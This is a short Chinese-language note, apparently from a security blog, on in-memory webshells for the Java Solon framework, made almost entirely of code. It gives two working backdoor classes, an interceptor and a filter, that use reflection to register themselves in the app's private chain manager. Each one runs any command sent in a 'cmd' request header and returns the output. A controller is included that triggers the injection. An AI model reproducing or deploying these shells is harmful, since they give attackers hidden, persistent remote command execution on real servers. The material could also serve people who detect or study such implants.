Solon内存马Note

325

RouterInterceptor型

  • shell实例
package org.example.filter;

import org.noear.snack.core.utils.StringUtil;
import org.noear.solon.Solon;
import org.noear.solon.SolonApp;
import org.noear.solon.core.ChainManager;
import org.noear.solon.core.handle.Context;
import org.noear.solon.core.handle.Handler;
import org.noear.solon.core.route.RouterInterceptor;
import org.noear.solon.core.route.RouterInterceptorChain;

import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.Scanner;

public class Shell implements RouterInterceptor {

    static {
        try {
            SolonApp app = Solon.app();
            Field chainManager = app.getClass().getSuperclass().getDeclaredField("_chainManager");
            chainManager.setAccessible(true);
            ChainManager o = (ChainManager) chainManager.get(app);
            o.addInterceptor(new Shell(),1);
        } catch (NoSuchFieldException e) {
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }
    }
    @Override
    public void doIntercept(Context ctx, Handler mainHandler, RouterInterceptorChain chain) throws Throwable {
        String cmd = ctx.header("cmd");
        if (!StringUtil.isEmpty(cmd)) {
            InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
            Scanner s = new Scanner(in).useDelimiter("\\A");
            String output = s.hasNext() ? s.next() : "";
            ctx.output(output);
        }
        chain.doIntercept(ctx, mainHandler);
    }
}

  • class.forName注入
package org.example.controller;

import org.noear.solon.annotation.Controller;
import org.noear.solon.annotation.Mapping;

@Controller
public class InjectController {
    @Mapping("/Inject")
    public String inject() throws ClassNotFoundException {
        Class.forName("org.example.filter.Shell");
        return "success Inject!!!";
    }
}


Filter型

  • Shell实例
package org.example.filter;

import org.noear.snack.core.utils.StringUtil;
import org.noear.solon.Solon;
import org.noear.solon.SolonApp;
import org.noear.solon.core.ChainManager;
import org.noear.solon.core.handle.Context;
import org.noear.solon.core.handle.Filter;
import org.noear.solon.core.handle.FilterChain;

import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.Scanner;

public class FilterShell implements Filter {

    static {
        try {
            SolonApp app = Solon.app();
            Field chainManager = app.getClass().getSuperclass().getDeclaredField("_chainManager");
            chainManager.setAccessible(true);
            ChainManager o = (ChainManager) chainManager.get(app);
            o.addFilter(new FilterShell(),1);
        } catch (NoSuchFieldException e) {
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }
    }


    @Override
    public void doFilter(Context ctx, FilterChain chain) throws Throwable {
        String cmd = ctx.header("cmd");
        if (!StringUtil.isEmpty(cmd)) {
            InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
            Scanner s = new Scanner(in).useDelimiter("\\A");
            String output = s.hasNext() ? s.next() : "";
            ctx.output(output);
        }
        chain.doFilter(ctx);
    }
}